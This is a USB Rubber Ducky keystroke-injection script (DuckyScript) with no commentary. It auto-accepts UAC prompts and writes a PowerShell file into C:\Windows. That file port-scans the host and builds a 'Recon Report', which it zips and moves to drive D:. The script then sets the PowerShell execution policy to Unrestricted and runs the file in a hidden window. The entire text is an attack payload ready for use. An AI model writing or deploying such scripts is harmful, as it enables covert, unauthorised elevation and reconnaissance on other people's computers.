DELAY 1050
GUI r
DELAY 1050
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 200
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $Computer = $env:COMPUTERNAME
ENTER
STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080
ENTER
STRING $Report = $Report  + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'
ENTER
STRING foreach ($PortNumber in $PortList) {
ENTER
STRING $PortCheck = New-Object Net.Sockets.TcpClient
ENTER
STRING $PortCheck.Connect($Computer, $PortNumber)
ENTER
STRING if ($PortCheck.Connected) {
ENTER
STRING $Report = $Report  +  '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}
ENTER
STRING else {$Report = $Report  +  '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
DELAY 300
STRING $saveFile = $userDir + '.zip'
ENTER
DELAY 100
STRING $toUSB = Compress-Archive -Path $userDir -DestinationPath $saveFile
DELAY 100
ENTER
DELAY 100
STRING $toUSB
DELAY 100
ENTER
STRING move-item $saveFile D:
CTRL S
DELAY  1600
STRING C:\Windows\ducky.ps1
ENTER
DELAY 1600
ALT F4
DELAY 1600
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1600
ALT y
DELAY 1600
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1600
STRING powershell.exe -windowstyle hidden -File C:\Windows\ducky.ps1
ENTER
